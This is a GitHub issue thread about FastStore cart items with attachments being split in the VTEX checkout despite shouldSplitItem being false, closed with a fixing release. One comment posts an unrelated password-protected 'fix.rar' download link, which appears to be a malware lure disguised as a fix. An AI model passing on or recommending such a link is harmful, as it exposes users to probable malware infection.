### ISSUE TITLE
shouldSplitItem not working on ValidateCartMutation with attachment

### ISSUE THREAD

**Issue by raphaelsantos-dev** [vtex/faststore#2426]
**Describe the bug**
I have the  cart configured to not split products on faststore.config.js
cart: {
    id: "",
    items: [],
    messages: [],
    shouldSplitItem: false,
},

When I change the quantity a product with a attachment on miniCart, the product is splited.  
This quantity is changed by cartStore.updateItemQuantit from sdk

import { cartStore } from 'src/sdk/cart'
cartStore.updateItemQuantity(item.id, quantity)

This split create a bug scenario, the request sent a quantity 2 on ValidateCartMutation, but response has a quantity 4
![image](https://github.com/user-attachments/assets/fa0bf466-2072-4510-9d35-9528da0e95e2)
![image](https://github.com/user-attachments/assets/226905df-63ae-4cc7-a0d8-ed7251d0429c)

.har file compressed to validation
[sfj-51cd395--farewayqa.preview.vtex.app_Archive [24-08-26 13-37-54].har.zip](https://github.com/user-attachments/files/16751334/sfj-51cd395--farewayqa.preview.vtex.app_Archive.24-08-26.13-37-54.har.zip)

**Expected behavior**
Product with attachment not split on orderForm when quantity is changed

**Steps to reproduce**
- Add the product with attachment to cart
- Change the quantity to 3 (product is splited)
- Change the attachment of this product (this action join the splitted product)
- Change the quantity to 4 (the payload has qty 4, but response has 6)

**Workspace**
https://sfj-51cd395--farewayqa.preview.vtex.app

**Comment by dseynhae** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by lucasfp13** [comment]
Hi @raphaelsantos-dev , sorry for the delay.
Could you confirm if is it still happening? I'm trying to reproduce using the `vtex.app` domain and the product SKU `2`, `USDA Choice Whole Boneless Ribeye` adding a note (I'm considering this is an attachment), changing quantities and observing the mutation response and didn't notice the wrong quantity.

**Comment by raphaelsantos-dev** [comment]
Hi @lucasfp13, the error still happening.

Every product in the store is added to the cart from the PLP or PDP with an attachment PNP_ItemPickingOptions. If you change the quantity without adding a note, you can see the split in the API or checkout https://farewayqa.myvtex.com/api/checkout/pub/orderForm/619b17fc1b554bacb19092b1bdbf8ecc. 
(This split is not shown in the Faststore cart.)

When you add a note to the cart (attachment PNP_Note), this action merges the split item. If you change the quantity again, the mutation response is different from the payload.

Please follow these steps while checking the orderform API with each step:

- Add the product with the attachment to the cart.
- Change the quantity to 3 (the product is split).
- Change the attachment of this product (this action merges the split product).
- Change the quantity to 4 (the payload shows qty 4, but the response shows 6).

**Comment by lucasfp13** [comment]
@raphaelsantos-dev oh so the split happens in the Checkout, right? Got it, I'll validate that thank you

**Comment by raphaelsantos-dev** [comment]
@lucasfp13 Yes, looking on faststore hook we have a single item not splited, but on orderform api, checkout and my orders, the item is splited.
![image](https://github.com/user-attachments/assets/c75d6983-bf2c-4946-98a0-be3bff54ea30)
<img width="1025" alt="image" src="https://github.com/user-attachments/assets/708b4471-0159-4388-94e3-96fd4be2172b">

**Comment by hellofanny** [comment]
Thank you for collaborating with us! ⭐

We're closing this issue as the fix from [PR](https://github.com/vtex/faststore/pull/2528) is now available in version [3.0.149](https://github.com/vtex/faststore/commit/0f328446c751e79479b7e75b2b4c3d9da35ba57c)
